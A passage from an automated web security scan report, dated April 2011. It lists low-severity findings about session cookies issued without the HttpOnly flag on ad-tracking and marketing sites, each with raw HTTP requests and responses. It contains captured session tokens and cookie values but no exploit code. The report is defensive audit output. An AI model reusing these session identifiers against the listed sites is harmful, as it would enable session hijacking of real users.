Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:20 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3885A4106257F5F9745999B829F8DC88; Path=/
Connection: keep-alive
Content-Length: 8937


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a
...[SNIP]...
6.4. http://provideby.com/show_dynamic/coupon/livingsocial-fnews/300x250-POL/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://provideby.com
Path:   /show_dynamic/coupon/livingsocial-fnews/300x250-POL/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /show_dynamic/coupon/livingsocial-fnews/300x250-POL/?id=afnews-clivsoc-dPOL-d{tag} HTTP/1.1
Host: provideby.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%224ec8615c3ace6c9a944fc11de1740a4c%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221302538878%22%3B%7De13844e155931755d00e16098861691d; expires=Mon, 11-Apr-2011 18:21:18 GMT; path=/
Content-Length: 1110
Connection: close
Content-Type: text/html; charset=UTF-8


<html><head><title>AdServer</title><style>html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre,a, abbr, acronym, address, big, cite, code, del, dfn, em, fo
...[SNIP]...
6.5. http://s.clickability.com/s  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://s.clickability.com
Path:   /s

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s?&5=300&35=1&6=900426689&7=426689&8=http%3A%2F%2Fwww.clickability.com%2F&9=&10=Clickability%20%7C%20www.clickability.com%20%7C%20SaaS%20Web%20Content%20Management%20System%20(WCM)%20for%20Enterprises&11=Mozilla%2F5.0%20(Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US)%20AppleWebKit%2F534.16%20(KHTML%2C%20like%20Gecko)%20Chrome%2F10.0.648.204%20Safari%2F534.16&12=en-US&13=1&14=1.7&15=1&16=1920x1200&17=16&18=0.1866640909574926&19=910 HTTP/1.1
Host: s.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:18:07 GMT
Server: Apache
Set-Cookie: ld=ZNMKqcIsIkf+1Ji2lF7c7H8WyPAe5ybf; Domain=s.clickability.com; Expires=Thu, 27-Apr-2079 03:32:14 GMT; Path=/
Set-Cookie: JSESSIONID=82C141A8097F17C5BBF47F230B509E0E.stats0x; Path=/
Set-Cookie: vid=W2IZOGTkr1BDAn7zn3P2JzwT7PRE9+yX3HsherrzsbM=; Domain=s.clickability.com; Expires=Thu, 27-Apr-2079 03:32:14 GMT; Path=/
P3P: policyref="http://www.clickability.com/w3c/p3p.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 42
X-Server-Name: dv-c1-r1-u14-b11
Connection: close
Content-Type: image/gif
Set-Cookie: Stats_Session=591922186.20480.0000; path=/

GIF89a.............!.......,........@..D.;
6.6. http://t3.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t3.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackalyze.asp?r=None&p=http%3A//www.ingeniux.com/solutions/website_optimization&i=12581 HTTP/1.1
Host: t3.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.ingeniux.com/solutions/website_optimization
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=243379265713070

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Sat, 09 Apr 2011 00:18:02 GMT
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t3.trackalyzer.com/0.gif
Content-Length: 152
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Eingeniux%2Ecom%2Fsolutions%2Fwebsite%5Foptimization; expires=Sat, 09-Apr-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACBRACQQ=IJNONGNCAJKDHCAIADHGJNPJ; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t3.trackalyzer.com/0.gif">here</a>.</body>
6.7. http://trc.taboolasyndication.com/hearst-wptz/trc/2/json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://trc.taboolasyndication.com
Path:   /hearst-wptz/trc/2/json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hearst-wptz/trc/2/json?list-id=rbox-t2v&id=951&list-size=8&uim=rbox-t2v&intent=s&uip=rbox-t2v&item-id=27483035&item-type=text&item-url=http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html&page-id=2ac6fb1502cd6a6ab15dbfe3963b5435b0e9803e&cv=4-6-12-44788-2000376&uiv=default&external=http%3A//www.wptz.com/news/index.html HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:47 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain; charset=utf-8
Set-Cookie: taboola_user_id=e3cbf8bd-271f-4170-9db8-4d166c313912;Path=/;Expires=Sun, 08-Apr-12 12:30:47 GMT
Set-Cookie: taboola_session_id=v1_3864f57c731de4fe0b1d609835b4301a_e3cbf8bd-271f-4170-9db8-4d166c313912_1302352247_1302352247;Path=/hearst-wptz/
Set-Cookie: JSESSIONID=.prod2-f5;Path=/
Set-Cookie: taboola_wv=;Path=/hearst-wptz/;Expires=Sun, 08-Apr-12 12:30:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 5225

trc_json_response =
{"trc":{"req":"bc5bef2d8104b48dc71f8af6ca218222","session-id":"3864f57c731de4fe0b1d609835b4301a","session-data":"v1_3864f57c731de4fe0b1d609835b4301a_e3cbf8bd-271f-4170-9db8-4d166c3
...[SNIP]...
6.8. http://ulocal.wptz.com/service/isUserLoggedIn.kickAction  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ulocal.wptz.com
Path:   /service/isUserLoggedIn.kickAction

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /service/isUserLoggedIn.kickAction?callback=ka_isUserLoggedInKASideCallback&as=62976 HTTP/1.1
Host: ulocal.wptz.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400; __utmz=174914276.1302352179.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2064108896-1302352190176; AxData=; Axxd=1; __utmv=; __utma=174914276.1441694128.1302352179.1302352179.1302352179.1; __utmc=174914276; __utmb=174914276.12.10.1302352179

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D8CC9541634BEB8D7F8935EB17EA88E9; Path=/
Set-Cookie: as=62976; Expires=Sun, 10-Apr-2011 12:31:11 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-stale=0
Content-Length: 56
Date: Sat, 09 Apr 2011 12:31:10 GMT
Set-Cookie: BIGipServerapp_server_pool=2075109568.42015.0000; path=/

ka_isUserLoggedInKASideCallback({"isLoggedIn":"false"});
6.9. http://valtira.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://valtira.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: valtira.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VLTALT=325428#www.valtira.com; VLTSID=rHTkRVaEF2pqO

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:20:26 GMT
Server: Apache
Set-Cookie: JSESSIONID=5C8DD9E0FCCD18984D4F592DB2DFF291.valtira-com-2; Path=/
Set-Cookie: VLTALT=325428#valtira.com; Domain=valtira.com; Expires=Tue, 06-Apr-2021 00:20:27 GMT; Path=/
Cache-Control: private,no-cache,no-store,must-revalidate
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 5905


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en
...[SNIP]...
6.10. http://www.clickability.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clickability.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.clickability.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vmVisitorState=0; vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; click_mobile=0

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b1
Content-Type: text/html;charset=utf-8
Expires: Sat, 09 Apr 2011 00:18:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:06 GMT
Connection: close
Set-Cookie: vmVisitorState=0; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: click_mobile=0
Content-Length: 82256

                       
                                                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
6.11. http://www.clickability.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clickability.com
Path:   /crossdomain.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.clickability.com
Proxy-Connection: keep-alive
Referer: http://media3.clickability.com/designvideo/home-container.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: click_mobile=0; cc=t; vmVisitorState=0; vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; _vt_=NGJjOTVmNjMxNWNmOWMzMzQyMGVhYjVjMTZmZDlkZTM%3D; __utmz=226774607.1302308285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=226774607.1949955237.1302308285.1302308285.1302308285.1; __utmc=226774607; __utmb=226774607.1.10.1302308285

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b1
Content-Type: text/xml;charset=utf-8
Expires: Sat, 09 Apr 2011 00:18:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:14 GMT
Connection: close
Set-Cookie: vmVisitorState=0; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:21 GMT; Path=/
Set-Cookie: vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:21 GMT; Path=/
Set-Cookie: click_mobile=0
Content-Length: 717

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
<all
...[SNIP]...
6.12. http://www.clickability.com/googlewotep  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clickability.com
Path:   /googlewotep

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /googlewotep HTTP/1.1
Host: www.clickability.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www.clickability.com/
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b1
Content-Type: text/plain; charset=UTF-8
Expires: Sat, 09 Apr 2011 00:18:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: vmVisitorState=0; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: click_mobile=0
Content-Length: 0

6.13. http://www.clickability.com/templates/Corp_Scripts_Template.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clickability.com
Path:   /templates/Corp_Scripts_Template.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/Corp_Scripts_Template.js HTTP/1.1
Host: www.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vmVisitorState=0; vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; click_mobile=0

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b1
Content-Type: text/html;charset=utf-8
Expires: Sat, 09 Apr 2011 00:18:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:05 GMT
Connection: close
Set-Cookie: vmVisitorState=0; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: click_mobile=0
Content-Length: 6708

function commentReturnFunction(){
   var obj = document.getElementById('commentPost');
   var message;
   
   if(Comment.error)
       var status = Comment.error;
   else
       var status = Comment.status;    

   i
...[SNIP]...
6.14. http://www.clickability.com/templates/browser.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clickability.com
Path:   /templates/browser.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/browser.js HTTP/1.1
Host: www.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vmVisitorState=0; vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; click_mobile=0

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Server-Name: dv-c1-r1-u24-b4
Content-Type: text/js;charset=utf-8
Expires: Sat, 09 Apr 2011 00:18:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:05 GMT
Connection: close
Set-Cookie: vmVisitorState=0; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: click_mobile=0
Content-Length: 894

var browser_version = parseFloat(navigator.appVersion.replace(/^.*MSIE /, ''))
var browser_type = navigator.appName;

document.write("<link rel='stylesheet' href='http://www.clickability.com/templa
...[SNIP]...
6.15. http://www.clickability.com/templates/clk_dbtemp_main.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clickability.com
Path:   /templates/clk_dbtemp_main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/clk_dbtemp_main.css HTTP/1.1
Host: www.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: click_mobile=0; click_mobile=0; vmVisitorState=0; vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b1
Content-Type: text/css;charset=utf-8
Expires: Sat, 09 Apr 2011 00:18:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:06 GMT
Connection: close
Set-Cookie: vmVisitorState=0; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:13 GMT; Path=/
Set-Cookie: vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:13 GMT; Path=/
Set-Cookie: click_mobile=0
Content-Length: 66144

/*-----{global link colors}-----*/

a, a:visited, a:active, a:hover
{
color: #A1030C;    
}


/*-----{Page: body centered}-----*/
body
{
   background-color: #FFFFFF;
   font-family: Arial, sans-
...[SNIP]...
6.16. http://www.clickability.com/templates/popovers.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clickability.com
Path:   /templates/popovers.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/popovers.js HTTP/1.1
Host: www.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vmVisitorState=0; vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; click_mobile=0

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b1
Content-Type: text/js;charset=utf-8
Expires: Sat, 09 Apr 2011 00:18:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:06 GMT
Connection: close
Set-Cookie: vmVisitorState=0; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:12 GMT; Path=/
Set-Cookie: click_mobile=0
Content-Length: 1736

/* Get Page dimensions */
function findLivePageWidth(){
if (window.innerWidth)
return window.innerWidth;
if (document.body.clientWidth)
return document.body.clientWidth;
...[SNIP]...
6.17. http://www.clickability.com/templates/swfobject.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clickability.com
Path:   /templates/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/swfobject.js HTTP/1.1
Host: www.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vmVisitorState=0; vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; click_mobile=0

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u14-b6
Content-Type: text/html;charset=utf-8
Expires: Sat, 09 Apr 2011 00:18:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:06 GMT
Connection: close
Set-Cookie: vmVisitorState=0; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:13 GMT; Path=/
Set-Cookie: vmSessionId=2FE6582E07B2ABC36A24B66685F3E6E3; Domain=www.clickability.com; Expires=Thu, 27-Apr-2079 03:32:13 GMT; Path=/
Set-Cookie: click_mobile=0
Content-Length: 10225

/*    SWFObject v2.2 <http://code.google.com/p/swfobject/>
   is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
var swfobject=function(){var D="undefined",r="ob
...[SNIP]...
6.18. http://www.mvtimes.com/marthas-vineyard/directory/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/directory/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /marthas-vineyard/directory/?a=1 HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/marthas-vineyard/on-island.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.4.10.1302621734

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:16:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=a8d8e35751186e367b10f53a8a6cfc62; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 25263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin template="/Templates/gene
...[SNIP]...
6.19. http://www.valtira.com/gwo  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.valtira.com
Path:   /gwo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gwo HTTP/1.1
Host: www.valtira.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 09 Apr 2011 00:18:21 GMT
Server: Apache
Set-Cookie: JSESSIONID=FF32A2EB15D99A2EE79873F06CAE7589.valtira-com-2; Path=/
Set-Cookie: VLTALT=325428#www.valtira.com; Domain=.valtira.com; Expires=Tue, 06-Apr-2021 00:18:21 GMT; Path=/
Set-Cookie: VLTSID=rHTkRVaEF2pqO; Domain=.valtira.com; Expires=Tue, 06-Apr-2021 00:18:21 GMT; Path=/
